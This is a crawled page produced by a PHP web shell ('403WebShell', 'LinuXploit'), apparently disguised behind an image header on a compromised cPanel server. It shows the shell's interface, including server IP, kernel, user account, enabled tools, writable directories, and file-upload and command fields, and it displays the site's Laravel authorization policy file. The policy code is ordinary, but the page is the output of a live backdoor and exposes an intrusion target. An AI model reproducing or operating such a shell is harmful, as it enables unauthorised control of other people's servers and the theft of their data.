����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 3.14.132.123
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/builderbox/public_html/common/Core/Policies/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/builderbox/public_html/common/Core/Policies/BasePolicy.php
<?php

namespace Common\Core\Policies;

use App\User;
use Common\Auth\BaseUser;
use Common\Auth\Roles\Role;
use Common\Core\Exceptions\AccessResponseWithAction;
use Common\Settings\Settings;
use Illuminate\Auth\Access\HandlesAuthorization;
use Illuminate\Auth\Access\Response;
use Illuminate\Http\Request;
use Str;

abstract class BasePolicy
{
    use HandlesAuthorization;

    /**
     * @var Request
     */
    protected $request;

    /**
     * @var Settings
     */
    protected $settings;

    public function __construct(Request $request, Settings $settings)
    {
        $this->request = $request;
        $this->settings = $settings;
    }

    protected function userOrGuestHasPermission(?User $user, string $permission): bool
    {
        if ($user) {
            return $user->hasPermission($permission);
        } else {
            if ($guestRole = Role::where('guests', true)->first()) {
                return $guestRole->hasPermission($permission);
            }
        }
        return false;
    }

    protected function userOrGuestHasOneOfPermissions(?User $user, array $permissions): bool
    {
        foreach ($permissions as $permission) {
            if ($this->userOrGuestHasPermission($user, $permission)) {
                return true;
            }
        }
        return false;
    }

    protected function denyWithAction($message, array $action = null): AccessResponseWithAction
    {
        /** @var AccessResponseWithAction $response */
        // TODO: use permission code here instead of passing action as code (test in belink and bedrive)
        $response = AccessResponseWithAction::deny($message, $action);
        $response->action = $action;
        return $response;
    }

    protected function storeWithCountRestriction(User $user, string $namespace): Response {
        [$relationName, $permission, $singularName, $pluralName] = $this->parseNamespace($namespace);

        // user can't create resource at all
        $response = $this->userhasPermission($user, $permission);
        if ($response->denied()) {
            return $response;
        }

        // user is admin, can ignore count restriction
        if ($user->hasPermission('admin')) {
            return Response::allow();
        }

        // user does not have any restriction on maximum resource count
        $maxCount = $user->getRestrictionValue($permission, 'count');
        if ( ! $maxCount) {
            return Response::allow();
        }

        // check if user did not go over their max quota
        if ($user->$relationName->count() >= $maxCount) {
            $message = __('policies.quota_exceeded', ['resources' => $pluralName, 'resource' => $singularName]);
            return $this->denyWithAction($message, $this->upgradeAction());
        }

        return Response::allow();
    }

    protected function userHasPermission(User $user, string $permission): Response
    {
        if ($user->hasPermission($permission)) {
            return Response::allow();
        } else {
            return Response::deny();
        }
    }

    protected function parseNamespace(string $namespace, string $ability = 'create'): array
    {
        // 'App\SomeModel' => 'Some_Model'
        $resourceName = Str::snake(class_basename($namespace));

        // 'Some_Model' => 'someModels'
        $relationName = Str::camel(Str::plural($resourceName));

        // 'Some_Model' => 'Some Model'
        $singularName = str_replace('_', ' ', $resourceName);

        // 'Some Model' => 'Some Models'
        $pluralName = Str::plural($singularName);

        // parent might need to override permission name. custom_domains instead of links_domains for example.
        $permissionName = $this->permissionName ?? Str::snake($relationName);

        return [$relationName, "$permissionName.$ability", $singularName, $pluralName];
    }

    protected function upgradeAction(): ?array
    {
        if ($this->settings->get('billing.enable')) {
            return ['label' => 'Upgrade', 'action' => '/billing/upgrade'];
        } else {
            return null;
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit